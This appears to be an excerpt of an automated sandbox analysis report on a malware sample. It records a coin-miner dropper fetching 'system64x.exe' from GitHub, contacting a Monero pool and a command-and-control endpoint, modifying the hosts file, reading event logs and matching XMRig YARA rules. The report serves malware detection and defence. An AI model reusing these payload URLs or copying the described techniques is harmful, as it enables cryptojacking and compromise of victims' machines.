                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ~1.PDB @ source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E85898DCE0 FindFirstFileExW,22_2_000001E85898DCE0
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE86DCE0 FindFirstFileExW,31_2_00000140AE86DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5CDCE0 FindFirstFileExW,32_2_00000195DD5CDCE0
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA9DCE0 FindFirstFileExW,33_2_000001160CA9DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10ADCE0 FindFirstFileExW,48_2_00000257E10ADCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C93DCE0 FindFirstFileExW,49_2_000001F28C93DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA9854DCE0 FindFirstFileExW,50_2_000001CA9854DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D26531DCE0 FindFirstFileExW,51_2_000001D26531DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27DDCE0 FindFirstFileExW,52_2_00000254A27DDCE0
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E6DCE0 FindFirstFileExW,53_2_0000028708E6DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DDDCE0 FindFirstFileExW,54_2_0000024B87DDDCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD40DCE0 FindFirstFileExW,55_2_00000205FD40DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056ADCE0 FindFirstFileExW,56_2_000001A2056ADCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F6DCE0 FindFirstFileExW,57_2_0000018EC1F6DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E0DCE0 FindFirstFileExW,58_2_0000025CE3E0DCE0
                      Source: global trafficTCP traffic: 192.168.2.5:49734 -> 149.102.143.109:10128
                      Source: global trafficHTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blob/main/system64x.exe?raw=true HTTP/1.1Host: github.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe HTTP/1.1Host: github.com
                      Source: global trafficHTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
                      Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                      Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blob/main/system64x.exe?raw=true HTTP/1.1Host: github.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe HTTP/1.1Host: github.com
                      Source: global trafficHTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: github.com
                      Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: gulf.moneroocean.stream
                      Source: global trafficDNS traffic detected: DNS query: wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org
                      Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 487Content-Type: application/jsonHost: wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.orgUser-Agent: cpp-httplib/0.12.6
                      Source: lsass.exe, 0000001F.00000000.2415950119.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3604819718.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://3csp.icrosof4m/ocp0
                      Source: svchost.exe, 00000037.00000000.2501565455.00000205FD288000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                      Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415653790.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3603749315.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415783526.00000140AE05A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: lsass.exe, 0000001F.00000000.2417171754.00000140AE209000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3608108139.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416903296.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000003.2771064773.00000140AE1F3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3609472974.00000140AE209000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                      Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                      Source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                      Source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                      Source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                      Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415653790.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3603749315.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415783526.00000140AE05A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: lsass.exe, 0000001F.00000000.2417171754.00000140AE209000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3608108139.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416903296.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000003.2771064773.00000140AE1F3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3609472974.00000140AE209000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3603749315.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415783526.00000140AE05A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: lsass.exe, 0000001F.00000002.3598384379.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: lsass.exe, 0000001F.00000002.3598384379.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                      Source: lsass.exe, 0000001F.00000000.2414877589.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3597393060.00000140AD850000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                      Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000346B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2417171754.00000140AE209000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3608108139.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416903296.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3603749315.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000003.2771064773.00000140AE1F3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3609472974.00000140AE209000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415653790.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415783526.00000140AE05A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                      Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                      Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: lsass.exe, 0000001F.00000000.2414877589.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3597393060.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                      Source: lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                      Source: lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2432150701.000000001C83A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coA
                      Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000003353000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000003467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com(
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blo
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5h
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php--cinit
                      Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49727 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49729 version: TLS 1.2

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Modifies the hosts file
                      Source: C:\Windows\SysWOW64\system64x.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Reads the Security eventlog
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                      Reads the System eventlog
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess information set: 01 00 00 00
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess information set: 01 00 00 00

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
